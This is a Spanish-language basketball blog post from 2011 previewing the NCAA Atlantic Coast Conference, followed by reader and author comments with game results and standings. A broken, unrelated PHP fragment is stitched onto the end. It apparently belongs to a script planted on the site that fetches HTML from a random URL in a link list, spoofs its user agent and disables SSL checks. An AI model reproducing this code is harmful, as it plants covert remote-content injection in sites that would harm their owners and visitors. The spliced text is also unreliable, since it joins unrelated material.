Análisis NCAA – Atlantic Coast Conference (ACC)

07 de February de 2011 por kantonyo

Al igual que hicimos el año pasado, vamos a intentar poneros al día de lo que está ocurriendo en la liga universitaria de baloncesto de los Estados Unidos. A un mes vista para llegar al March Madness, los equipos van tomando posiciones para clasificarse y algunos jugadores empiezan a encaramarse a los primeros puestos del próximo draft.

A diferencia de otros años, esta temporada no hay un jugador que salga con cierta ventaja en la carrera del número 1. La decepcionante temporada de Harrison Barnes en North Carolina, la grave lesión de Kyrie Irving o la negativa de la NCAA al turco Enes Kanter para poder jugar con los Wildcats de Kentucky ha dejado un poco devaluada esta batalla. Aún así, habrá que seguir con mucho detalle a jugadores como el alapívot de primer año Perry Jones en Baylor, al también novato Jared Sullinger en Ohio State, a un gran lanzador como Jimmer Fredette en BYU o al base de tercer año Kemba Walker, en los Huskies de Connecticut.

En este primer artículo nos centraremos en la conferencia más emblemática de la competición.

Si una temporada antes los Tar Heels de North Carolina se llevaron a la costa atlántica el título de campeones de la NCAA, el año pasado fueron sus grandes rivales históricos, los Blue Devils de Duke, los que volvieron a conseguir tal hazaña para la ACC.

Los pupilos de Mike Krzyzewski vuelven a ser los máximos favoritos a llevarse el título de la conferencia por tercera vez consecutiva. La gran noticia este año ha sido ver como Kyle Singler, jugador más valioso de la última Final Four, decidió esperar un año más para dar el salto al baloncesto profesional. El alero, que cumplirá 23 años en el mes de mayo, ha mantenido su rendimiento esta temporada a pesar de la baja de Jon Scheyer, su complemento perfecto en los últimos tres años. Por el contrario, la mala noticia llegó cuando el base novato Kyrie Irving se lesionaba de gravedad en un partido contra Butler del mes de diciembre. Irving había demostrado un gran potencial hasta la fecha con actuaciones memorables como la que protagonizó ante los siempre difíciles Spartans de Michigan State donde consiguió anotar 31 puntos. Según las últimas noticias, parece que la lesión se está complicando por lo que podría perderse el resto de temporada y quién sabe si la posibilidad de salir elegido en el próximo draft. El base de cuarto año, Nolan Smith, continúa mejorando año tras año y se ha colocado como el máximo anotador de la conferencia con 20,5 puntos por partido. Otra incorporación destacada ha sido Seth Curry, hermano pequeño del jugador de Golden State, Stephen Curry. El pequeño guard viene de pasarse una temporada en blanco debido al traspaso desde Liberty Flames y le está afectando a su nivel de juego que está siendo muy irregular. En el poste alto destaca Ryan Kelly, muy motivado en los últimos encuentros y los hermanos Plumlee. Hasta la fecha han conseguido un record de 21-2 y se han colocado en el quinto puesto del AP top 25.

Los grandes rivales en la ACC, vuelven a ser los Tar Heels de North Carolina. Los de Chapel Hill intentarán olvidar su mala experiencia del año pasado, donde no consiguieron clasificarse al torneo final tras perder a su columna vertebral (Ty Lawson, Ellington y Hansbrough) que les dio el título de 2009. Las ilusiones de UNC se basan principalmente en la progresión del ala-pívot John Henson que actualmente aspira a top 10 del draft. Henson es un gran reboteador y taponador gracias a su gran envergadura y sorprende mucho que el entrenador Roy Williams esté siendo tan rácano con los minutos de John en pista. El otro referente en la pintura está siendo el fuerte pívot de raza blanca, Tyler Zeller. Sin duda, la decepción hasta la fecha está siendo uno de los mejores recruits del año, el alero Harrison Barnes, al cual le está costando demasiado afianzarse en la liga universitaria después de llegar como uno de los mejores jugadores del High School. Sin embargo, en los dos últimos partidos ha tenido dos grandes actuaciones por encima de los 25 puntos con buenos porcentajes de tiro por lo que habrá que estar atentos a la progresión de Barnes. Nadie duda de su enorme talento y si mantiene el nivel de los últimos partidos coloca a los Tar Heels como uno de los aspirantes al torneo final. UNC está juntando un equipo joven con mucho talento, gracias también a la llegada de Reggie Bullock o Kendall Marshall. Si mantiene el bloque para el año que viene estará a un nivel altísimo.

Por otra parte, Florida State dará mucha guerra en la conferencia gracias a la plantilla tan compensada que ha logrado construir. Al mando del equipo se sitúa el atlético alero Chris Singleton, aspirante a top 15 del draft en el cual se han volcado muchas expectativas. El alapívot Bernard James está siendo una de las sorpresas agradables de la ACC a pesar de los pocos minutos de los que dispone.

Otros jugadores destacables en la conferencia son el pívot sophomore de Maryland, Jordan Williams, máximo reboteador de la ACC, al que comparan con Carlos Boozer. Reggie Jackson, base de Boston College, el cual ha tenido una gran progresión esta temporada. Reggie Johnson de Miami, un pesado (140 kg) alapívot con gran capacidad reboteadora al estilo de Glen Davis e Iman Shumpert, base de Georgia Tech que destaca por su gran defensa exterior.

Quinteto Ideal

C – Jordan Williams (Maryland)
PF – John Henson (North Carolina)
SF – Kyle Singler (Duke)
SG – Nolan Smith (Duke)
PG – Kyrie Irving (Duke) (Lesionado)

Otros jugadores a seguir

– Centers: Reggie Johnson (Miami Fl), Tyler Zeller (North Carolina), Mason Plumlee (Duke)
– Forwards: Jerei Grant (Clemson), Jeff Allen (Virginia Tech), Richard Howell (North Carolina St), Bernard James (Florida St), Ryan Kelly (Duke), Chris Singleton (Florida St), CJ Leslie (North Carolina St), Harrison Barnes (North Carolina), Mike Scott (Virginia) (lesionado)
– Guards: Reggie Jackson (Boston Coll), Iman Shumpert (Georgia Tech), Corey Raji (Boston Coll), Reggie Bullock (North Carolina), Malcolm Delaney (Virginia Tech)

Comenta

13 comentarios a esta entrada

  1. sergio dice:
    #1

    Otro apasionante articulo Kantonyo. Si no escribieses por aqui llegaria el Draft conociendo a solo 3 o 4 jugadores. Gracias por tu trabajo!

      Citar

  2. Denise dice:
    #2

    El otro día vi en la tele el Unicaja-Lietuvos.
    Un vigardo lituano que responde al nombre de Valanciunas tiene toda la pinta de ser NBA en los próximos años. No me extrañaría que fuese drafteado este año, aunque todavía esta verde para jugar en la NBA.
    Si algun ojeador de la NBA me está leyendo……XD, draftearlo y dejadlo 2 añitos más en Europa que desarrolle su juego y sus recursos tranquilamente. Hacedme caso, es una buena inversión de futuro.

      Citar

  3. Txusma dice:
    #3

    Siempre puedes pedir comisión por el consejo, Denise… 😀

    Yo venía oyendo cosas interesantes de Harrison Barnes pero sabía que el principio de temporada estaba siendo complicado. Crees que si las cosas no mejoran mucho pueda mantenerse un año más en la Universidad?

      Citar

  4. Scriers dice:
    #4

    NCAA…. En serio… sois unos frikis entrañables.

      Citar

  5. kantonyo dice:
    #5

    Ya sabes que muchas veces la decisión de dar el salto a la NBA depende mucho de factores personales, sobre todo economicos. Pero yo creo que si Barnes empieza a funcionar como en los tres últimos partidos, no tengo duda que UNC llegará lejos y Barnes estará en el proximo draft.

    Denise, al igual que Valanciunas, desde Europa este año estarán Motiejunas y Vesely, que el año pasado se borraron del draft en el ultimo momento aunque aspiraban a top20.

    Por cierto, de Valanciunas ya hable en su dia http://blog.tjnba.com/2010/09/13/mundobasket-2010-final/ . Está haciendo una temporada de escandalo para sus añitos.

    Estaría bien que alguien se ocupara de ponernos al dia con la Euroliga… a ver si alguien me coge el guante.

      Citar

  6. kantonyo dice:
    #6

    El miercoles se disputó el partido más esperado de la Conferencia: North Carolina – Duke.

    GAnó Duke tras una gran remontada en la última fase del partido tras ir a remolque durante todo el encuentro.

    El base de Duke, Nolan Smith, fue el mejor del partido con 34 puntos. Kyle Singler al contrario no tuvo un buen dia aunque si fue importante en la victoria de su equipo. El hermano de Stephen, Seth Curry, sigue mejorando y hizo un gran partido con 22 puntos, 5 asistencia y 6 rebotes.

    A pesar de la derrota, North Carolina demostró un buen nivel. La pareja Henson (14p+12r) / Zeller (24p+13r) dominó comodamente los tableros demostrando que tienen uno de los mejors juegos interiores de la competición. La decepción fue una vez más Harrison Barnes que se quedó en 9 puntos con un actuaciones muy precipitadas y dejando claro una vez más que esta muy verde en aspectos tacticos.

      Citar

  7. kantonyo dice:
    #7

    Por cierto para los que quieran ver el resumen y el ambiente que se vive en el derby UNC-Duke os dejo el enlace: http://espn.go.com/video/clip?categoryId=2459792&id=6107233

      Citar

  8. kantonyo dice:
    #8

    Otra noticia desagradable nos llega desde la ACC. Chris Singleton, alapívot de Florida State y posible top 15 del próximo draft se lesionó hace unas semanas y aunque ha sido operado con exito, se espera que no vuelva a jugar este año, aunque todavia no es seguro. Una pena.

    Por cierto, para los que se quieran empezar a animar a esto de la NCAA, que mejor que un Duke-North Carolina donde se jugaran el titulo de la Regular Season de la Conferencia. Probablemente de lo mejor que se puede ver en este momento en la NCAA. Este sabado 5 de Marzo.

      Citar

  9. kantonyo dice:
    #9

    Ayer se decidió el campeón de la liga Regular en la Conferencia ACC, con la sorprendente victoria de North Carolina contra Duke (81-67). Buen partido de Harrison Barnes, que con esta victoria vuelve a estar entre los favoritos a copar los puestos altos del draft. El mejor del encuentro fue el freshman Kendall Marshall (1991), un base de corte muy clásico, con una gran capacidad de visión (de lo mejorcito de los últimos años), muy buen manejo de balón que está promediando 6 asistencias en sólo 22 minutos de juego. Le costo mucho encontrar minutos en UNC pero poco a poco está ya promediando 34 minutos por partido coincidiendo con la gran racha de UNC (12-1). A mi personalmente me gusta mucho.

    Henson y Zeller pareja de interiors de los Tar Heels volvieron a ganarle la partida a los hermanos Plumlee y Ryan Kelly. Esta vez el gran partido de Nolan Smith no bastó para conseguir la victoria. En los Blue Devils tambien destacó el hermano pequeño de Stephen Curry (Seth Curry) con 6 de 11 en tiros de 3p.

      Citar

  10. Txusma dice:
    #10

    Y que hay de Kyle Singler? Por lo q veo en el Box Score bastante mal partido. Este año su cotización en el draft es peor que la del año pasado. Cagada quedándose un añito más en la NCAA?

      Citar

  11. kantonyo dice:
    #11

    Al igual que he hecho con la conferencia Big East, aquí va la clasificación final de la ACC y sus emparejamientos de playoff:

    1. North Carolina 14-2
    2. Duke 13-3
    3. Florida State 11-5
    4. Clemson 9-7
    5. Virginia Tech 9-7
    6. Boston College 9-7
    7. Maryland 7-9
    8. Virginia 7-9
    9. Miami FL 6-10
    10. North Carolina State 5-11
    11. Georgia Tech 5-11
    12. Wake Forest 1-15

    Playoffs:

    #1 North Carolina vs Virginia/Miami FL
    #4 Clemson vs BostonColl/WakeForest
    #2 Duke vs Maryland/NorthCar St
    #3 Florida St vs VirginiaTech/Georgia Tech

      Citar

  12. kantonyo dice:
    #12

    Duke y North Carolina volveran a verse las caras otra vez hoy en la final del torneo de la Conferencia ACC.

    Duke llega a la final despues de arrasar con Virginia Tech con un sensacional Nolan Smith que acabó con 27 puntos y eso que era duda tras una lesión en los cuartos de final ante Maryland. Kyle Singler estuvo correcto con 13 puntos y 11 rebotes, tras el gran partido que hizo contra Maryland (29 puntos y 9 rebotes). En Virginia Tech volvió a ser el mejor Malcolm Delaney que ha consegudo llevar a los Hokies a las semifinales. Veremos si estos resultados les meten en el March Madness a los de Virginia Tech.

    Harrison Barnes crece a pasos agigantados según avanza la competición. Ayer el alero tuvo una actuación de escandalo anotando 40 puntos (12-17) y capturando 8 rebotes. De nuevo la fortaleza en el poste de Zeller y Henson, y la buena conducción de Kendall Marshall fueron la clave en la eliminatoria. Clemson nada pudo hacer a pesar del buen partido del base Demontez Stit con 25 puntos.

      Citar

  13. Txusma dice:
    #13

    Oye! Y Kyrie Irving cuando vuelve?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>